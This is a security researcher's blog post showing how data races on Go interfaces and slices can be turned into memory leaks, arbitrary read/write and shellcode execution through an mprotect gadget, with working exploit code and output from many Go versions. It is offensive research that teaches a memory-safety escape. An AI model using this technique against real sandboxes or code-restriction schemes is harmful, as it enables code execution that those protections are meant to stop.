These factors made the challenge easier for a CTF: the fmt package gives a nice leak with %p, and the lack of PIE plus the fixed Go version (1.13.3) allow hardcoding addresses and make the binary deterministic in code layout, heap behavior, compiler optimizations and calling convention.
Is it possible to achieve arbitrary code execution on any Go version, even with PIE, and with no package import at all, just builtins? Yes! It's been sitting in my exploits folder for long enough that it's time to write about it.
Data races and exploit primitives
As discussed before, Go's current implementation of interfaces and slices as multiword values gives us the ability to race them:
- the interface race gives us a type confusion, which we can use to confuse an interface with a struct of 2 uints to leak its internal representation of type + pointer, giving us an addrOf primitive to replace our fmt.Sprintf("%p")
- the slice race gives us the ability to write out of bounds, which we can use to build an arbitrary slice (data, length and capacity), giving us an arbitrary read/write primitive
Interface race
The building block of our interface race will be to race 2 structs matching this interface:

type racerValue interface {
	Value() uint64
}

We then define structs matching this interface. The first struct will simply hold whatever we want to leak, as an interface, so internally represented as a type and a pointer to the data:
type holdInterface struct {
	i interface{}
}

func (s holdInterface) Value() uint64 { return 0 }

The second struct will be used to leak the address of the interface data pointer, so we overlay the interface representation of type + pointer:
type holdInterfaceAddress struct {
	typ  uint64
	addr uint64
}

func (s holdInterfaceAddress) Value() uint64 { return s.addr }

The third struct will be used to leak the value behind the address of the interface data pointer, simply by defining it as a pointer and dereferencing it. We could go on like this, but we don't need more.
type holdInterfaceValue struct {
	typ  uint64
	addr *uint64
}

func (s holdInterfaceValue) Value() uint64 {
	if s.addr != nil {
		return *s.addr
	}
	return 0
}

The interface race gives us a type confusion where the data is the first struct (what we want to leak) but the type points to the second or third struct, depending on what we want to read (address or value).
Then the race is roughly:
func raceLeak(data, leak racerValue) uint64 {
	confused := data
	done := false
	go func() {
		for {
			confused = data
			confused = leak
			if done {
				return
			}
		}
	}()
	for {
		if v := confused.Value(); v > 0 {
			done = true
			return v
		}
	}
}
Avoiding compiler optimizations
There's a problem with the previous code: over the years, the Go compiler became smarter at eliminating useless code, such as our data race flipping one variable between two values:

for {
	confused = data
	confused = leak
}

The compiler realizes it's useless and eliminates the whole loop (disassemble the binary to see).
I had to adjust my approach over time; as of Go 1.18 (and all versions before), this works:
dontOptimize := confused
for {
	confused = data
	// this call makes the compiler think confused is being used,
	// so it doesn't optimize away the loop
	func() { dontOptimize = confused }()
	confused = leak
}
_ = dontOptimize // otherwise the compiler complains about an unused variable
First primitive: addrOf
We now have enough to build our first addrOf primitives:

func addrOf(x interface{}) uint64 {
	return raceLeak(&holdInterface{x}, &holdInterfaceAddress{})
}

func addrOfValue(x interface{}) uint64 {
	return raceLeak(&holdInterface{x}, &holdInterfaceValue{})
}

And from there, we can look at exploiting the slice race to build our arbitrary read/write primitive.
Slice race
To exploit the race reliably across Go versions, we need:
- an attacking slice: we will race between this one and a longer slice, aiming for a state where the data pointer is the attacking slice's but the length is still the long slice's, so we can reach out of bounds of the attacking slice
- a victim slice somewhere after: we will overwrite its data pointer, length and capacity
attacker := make([]uint64, 1)

Then, to place the victim, we hold the victim slice inside a struct and lay out a long contiguous slice of victim slices, making it a large allocation, so most likely somewhere after our previous allocation:
type victimSlice struct {
	s []byte
}

targets := make([]victimSlice, 4096)

Then we just have to aim at the first element: targets[0].s.
To do that, we need to build a slice with a length long enough to reach it. We use the interface race to read the addresses of the attacker and targets slices, then calculate the difference (if it's negative, our allocation strategy didn't work and the victim got allocated before the attacker).
targetsAddr := addrOfValue(targets)
attackerAddr := addrOfValue(attacker)
diff := int64(targetsAddr - attackerAddr)
if diff < 0 {
	panic("attacker after target")
}

The out-of-bounds index from the attacker slice to reach our victim (targets[0].s) is therefore diff/sizeof(uint64), and counting the size of the attacker slice itself (a slice is 3x uint64: data, length, capacity), the long slice length needs to be at least diff/8+3.
idx := diff / 8
long := make([]uint64, diff/8+3)

Then the race is roughly:
func sliceAt(addr, length uint64) []byte {
	// [...] allocate attacker, targets, long, calculate idx
	confused := attacker
	go func() {
		for {
			confused = long
			confused = attacker
			if targets[0].s != nil {
				return
			}
		}
	}()
	for {
		func() {
			defer func() { recover() }()
			// confused points to attacker but still has len/cap of long
			confused[idx] = addr
			confused[idx+1] = length // len
			confused[idx+2] = length // cap
		}()
		if targets[0].s != nil {
			return targets[0].s
		}
	}
}
Second primitive: arbitrary read/write
We can create an arbitrary slice. We can't make it start at 0 (nil slice, unusable), but we can start it at 1, so the address is just off by one, and if we set the length to 2^64-1 then we can address the entire memory:

func arbitraryRW() memory {
	return sliceAt(1, 0xffffffffffffffff)
}

type memory []byte

func (m memory) read(addr uint64) byte         { return m[addr-1] }
func (m memory) write(addr uint64, value byte) { m[addr-1] = value }

We can extend it with helper functions like write8(addr, value uint64) and index(from, max uint64, what []byte) uint64 to find a sequence of bytes. Omitted here for brevity; see the full exploit at the end.
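For completeness, here is one possible shape for those helpers — a sketch of mine, not necessarily what the full exploit uses — exercised on a plain backing buffer instead of real process memory:

```go
package main

import "fmt"

// memory is the off-by-one view from above: address N maps to m[N-1].
type memory []byte

func (m memory) read(addr uint64) byte         { return m[addr-1] }
func (m memory) write(addr uint64, value byte) { m[addr-1] = value }

// write8 stores a uint64 at addr, one little-endian byte at a time.
func (m memory) write8(addr, value uint64) {
	for i := uint64(0); i < 8; i++ {
		m.write(addr+i, byte(value>>(8*i)))
	}
}

// p64s encodes a uint64 as its 8 little-endian bytes.
func p64s(v uint64) []byte {
	b := make([]byte, 8)
	for i := range b {
		b[i] = byte(v >> (8 * uint(i)))
	}
	return b
}

// index scans [from, from+max) for the byte sequence what and
// returns the address of the first match, or 0 if not found.
func (m memory) index(from, max uint64, what []byte) uint64 {
outer:
	for a := from; a+uint64(len(what)) <= from+max; a++ {
		for i, b := range what {
			if m.read(a+uint64(i)) != b {
				continue outer
			}
		}
		return a
	}
	return 0
}

func main() {
	// demo on a 32-byte buffer; valid addresses are 1..32
	m := memory(make([]byte, 32))
	m.write8(5, 0x1122334455667788)
	fmt.Println(m.read(5) == 0x88, m.index(1, 32, p64s(0x1122334455667788)) == 5)
}
```

Against the real arbitrary slice, the same code walks actual process memory, which is how the exploit later locates the shellcode and the gadget immediate.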
Code execution
Instead of directly calling execve, let's aim for shellcode execution. We can store the shellcode as a constant, but it will not be executable, so first we need to call mprotect to set the shellcode page as executable.

We can store a few executable bytes inside immediates (bring our own gadget) and use the arbitrary read/write to find their address. But how do we jump to them? We also want this to be portable across all Go versions, even when built with PIE. Go's calling convention used to pass all arguments on the stack, but since Go 1.18 it uses registers. That's fine: we can pass enough arguments that the rest spill onto the stack, and as long as the two layouts don't overlap, we're good in both cases.
Here's what we can do:
- we'll set up a short gadget reading arguments from the stack and executing syscall then returning, 8 bytes so it fits a uint64 immediate:
5f    ; pop rdi  # it's a call, so the first pop is the saved rip
5f    ; pop rdi  # addr
5e    ; pop rsi  # len
5a    ; pop rdx  # prot
58    ; pop rax  # sys_mprotect
0f 05 ; syscall
c3    ; ret
- we use a function variable (i.e. a function pointer), get its address, write to it to change its destination to the gadget, then call it
- we'll lay out the arguments to be compatible with Go before and after 1.18
m := arbitraryRW()
mainAddr := addrOfValue(main)
shellcodeAddr := m.index(mainAddr, 0x100000, []byte(shellcode[:8]))
find := func(v uint64) uint64 { return m.index(mainAddr, 0x1000, p64s(v)) }
var call func(uint64, uint64, uint64, uint64, uint64, uint64, uint64,
	uint64, uint64, uint64, uint64, uint64, uint64, uint64)
callAddr := addrOf(&call)
// pop rdi; pop rdi; pop rsi; pop rdx; pop rax; syscall; ret
// pop rdi twice because the first pop is the saved rip from the call
gadget := find(0xc3050f585a5e5f5f)
gadgetAddr := addrOf(&gadget)
m.write8(callAddr, gadgetAddr)
addr := shellcodeAddr & ^(PAGE_SIZE - 1)
const len = PAGE_SIZE * 2
const PROT_READ = 1
const PROT_WRITE = 2
const PROT_EXEC = 4
const prot = PROT_READ | PROT_WRITE | PROT_EXEC
const sys_mprotect = 10
call(
	// Go < 1.18 calling convention: everything on the stack
	addr,          // rdi
	len,           // rsi
	prot,          // rdx
	sys_mprotect,  // rax
	shellcodeAddr, // ret
	0, 1, 2, 3,    // unused
	// Go >= 1.18 calling convention uses registers, then the stack;
	// luckily for us the two layouts don't overlap so we can prepare both
	addr,          // rdi
	len,           // rsi
	prot,          // rdx
	sys_mprotect,  // rax
	shellcodeAddr, // ret
)
Compatibility
It works on current tip (Go 1.18), regardless of PIE:

$ go version
go version devel go1.18-6178d25fc0 Wed Dec 29 20:20:32 2021 +0000 linux/amd64
$ go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
$ go run -buildmode=pie exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)

As well as old versions:
$ for v in 1.{17..8} 1.7.6 1.6.4 1.5.4; do
    go install golang.org/dl/go${v}@latest >/dev/null 2>&1 || continue
    go$v download >/dev/null 2>&1
    go$v version
    go$v run exploit.go
  done
go version go1.17 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.16 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.15 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.14 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.13 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.12 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.11 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.10 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.9 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.8 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.7.6 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.6.4 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.5.4 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)

To test further back, we have to compile from source and also set GOMAXPROCS=2, as the default was 1 before go1.5:
$ (
    git clone -b release-branch.go1.4 --depth 1 https://go.googlesource.com/go go1.4
    cd go1.4/src
    ./make.bash
  )
$ go1.4/bin/go version
go version go1.4-bootstrap-20170531 linux/amd64
$ GOMAXPROCS=2 go1.4/bin/go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
From there, building on a modern system requires small tweaks:

$ (
    git clone -b release-branch.go1.3 --depth 1 https://go.googlesource.com/go go1.3
    cd go1.3/src
    CGO_ENABLED=0 CFLAGS='-Wno-implicit-fallthrough -Wno-shift-negative-value' ./make.bash
  )
$ go1.3/bin/go version
go version go1.3.3 linux/amd64
$ GOMAXPROCS=2 go1.3/bin/go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
$ (
    git clone -b release-branch.go1.2 --depth 1 https://go.googlesource.com/go go1.2
    cd go1.2/src
    sed -i 's/-Werror//' make.bash
    sed -i 's/"-Werror",//' cmd/dist/build.c
    CGO_ENABLED=0 ./make.bash
  )
$ go1.2/bin/go version
go version go1.2.2 linux/amd64
$ GOMAXPROCS=2 go1.2/bin/go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
$ (
    git clone -b release-branch.go1.1 --depth 1 https://go.googlesource.com/go go1.1
    cd go1.1/src
    sed -i 's/-Werror//' make.bash
    sed -i 's/"-Werror",//' cmd/dist/build.c
    CGO_ENABLED=0 ./make.bash
  )
$ go1.1/bin/go version
go version go1.1.2 linux/amd64
$ GOMAXPROCS=2 go1.1/bin/go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)

Unfortunately I couldn't get go1 to compile on my system (I'm getting a weird fault), but it probably works as well.
Full exploit
On github: https://github.com/StalkR/misc/blob/master/go/gomium/exploit.go

In total, the exploit uses 6 data races:
- read attacker slice address
- read victim slice address
- write slice out of bounds
- read address of main
- read address of function pointer
- read address of gadget
Conclusion
As said before, while a fun exercise, it's pretty useless in the current Go threat model: anything accepting arbitrary Go code and running it should be sandboxed.

However, if we imagine organizing Go packages by what they do (imports) and enforcing some guarantees around that (think manifests), such an exploit could be a way around it. Because of that, there are people looking into making these data races non-exploitable, e.g. by boxing the data structures: storing them elsewhere and only atomically moving a single pointer to them, at some performance cost. Maybe we'll see it in a future Go version. Until then, happy new year :)
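A minimal sketch of that boxing idea — my illustration of the concept, not a proposed runtime implementation: keep the multiword value immutable behind a single pointer and publish the pointer atomically, so a racing reader always sees a consistent (type, data) pair, never a torn mix of two values:

```go
package main

import (
	"fmt"
	"sync/atomic"
	"unsafe"
)

// raceCheck publishes two immutable boxed interface values by
// atomically swapping one pointer, while the reader verifies it
// never observes a torn (mixed type/data) value.
func raceCheck() bool {
	a := interface{}(uint64(1))
	b := interface{}("two")
	cur := unsafe.Pointer(&a)
	done := make(chan struct{})
	go func() {
		for i := 0; i < 100000; i++ {
			// the two-word interface values a and b are never
			// mutated; only the single pointer to them moves
			atomic.StorePointer(&cur, unsafe.Pointer(&a))
			atomic.StorePointer(&cur, unsafe.Pointer(&b))
		}
		close(done)
	}()
	torn := false
	for running := true; running; {
		select {
		case <-done:
			running = false
		default:
		}
		// the box is immutable, so copying it after the atomic
		// load is safe: type and data words always match
		switch (*(*interface{})(atomic.LoadPointer(&cur))).(type) {
		case uint64, string:
		default:
			torn = true
		}
	}
	return torn
}

func main() {
	fmt.Println("torn read observed:", raceCheck())
}
```

Unlike the direct two-word assignment raced earlier, the reader here can only ever load a pointer to one box or the other, which is exactly what kills the type-confusion primitive — at the cost of an allocation and an indirection per update.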